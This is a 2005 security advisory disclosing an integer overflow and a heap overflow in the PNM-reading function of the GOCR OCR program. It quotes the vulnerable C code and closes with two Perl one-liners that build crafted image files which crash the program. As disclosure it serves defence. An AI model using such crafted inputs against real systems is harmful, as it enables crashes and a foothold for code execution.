Overflow.pl Security Advisory #1 GOCR - Multiple vulnerabilities URL: http://www.overflow.pl/adv/gocr.txt Date: 04.05.2005 1. Background GOCR is an OCR (Optical Character Recognition) program, developed under the GNU Public License. It converts scanned images of text back to text files. Joerg Schulenburg started the program, and now leads a team of developers. GOCR can be used with different front-ends, which makes it very easy to port to different OSes and architectures. It can open many different image formats, and its quality have been improving in a daily basis. http://jocr.sourceforge.net/index.html 2. Description In my opinion GOCR should be rewritten, becouse there are many implementation and security problems. I only research function that reads PNM image file. In two version of it (using netpbm library and don`t), exists critical security vulnerabilities. Local exploitation of heap overflow and integer overflow in GOCR, could allow an attacker to execute arbitrary code. 2.1. Integer overflow in readpgm() that used netpbm library. An integer overflow leading to heap overflow, exists when GOCR read special crafted PNM file. The vulnerable code is in function readpgm() that use netpbm library: src/pnm.c: ... /* for simplicity only PAM of netpbm is used, the older formats PBM, PGM and PPM can be handled implicitly by PAM routines (js05) */ #ifdef HAVE_PAM_H void readpgm(char *name, pix * p, int vvv) { ... /* read pgm */ pnm_readpaminit(fp, &inpam, sizeof(inpam)); p->x = inpam.width; p->y = inpam.height; if ( !(p->p = (unsigned char *)malloc(p->x*p->y)) ) F1("Error at malloc: p->p: %d bytes", p->x*p->y); ... for ( i=0; i < inpam.height; i++ ) { pnm_readpamrow(&inpam, tuplerow); for ( j = 0; j < inpam.width; j++ ) { ... p->p[i*inpam.width+j] = sample; ... } } } If result of p->x*p->y overflow integer variable, we can allocate not enough memory for image buffer. For example, if height of image is 4 and width is 1073741825, we allocate only 4 bytes for it. This vulnerability lead to heap overflow on reading base data of pmn file. 2.2 Heap Overflow in readpgm() that don`t use netpbm library. A heap overflow exists when GOCR read special craftem plain PNM file (P3 format). The vulnerable code is in function readpgm() that NOT used netpbm library: src/pnm.c: /* if PAM not installed, here is the fallback routine, which is not so powerful */ void readpgm(char *name,pix *p,int vvv){ ... pic=(unsigned char *)malloc( nx*ny ); ... if( c2=='3' )for(mod=k=j=i=0;i<nx*ny*3 && !feof(f1);){ c1=read_char(f1); if( !isdigit(c1) ) { if( !isspace(c1) )F0("unexpected char"); if(1&mod) { k+=j; if(mod==5){ pic[i]=k/3; i++; } j=0; mod=(mod+1)%6; } } else { j=j*10+c1-'0'; if(!(mod&1)) mod++; }; } ... The array pic is only nx*ny elements large, but loop end when "i<nx*ny*3 && !feof(f1)", so if file have more bytes, pic array could be overflowed. 3. Detection Current gocr version (0.40) is vulnerable. Probably older too. 4. PoC Interger overflow: bash-2.05b$ perl -e 'print "P3\n4 1073741825\n255\n"; print "0 "x1024' > vuln.pnm bash-2.05b$ ./gocr vuln.pnm Segmentation fault (core dumped) Heap overflow: bash-2.05b$ perl -e 'print "P3\n10 10\n255\n"; print "0 "x1024' > vuln.pnm bash-2.05b$ ./gocr vuln.pnm Segmentation fault (core dumped)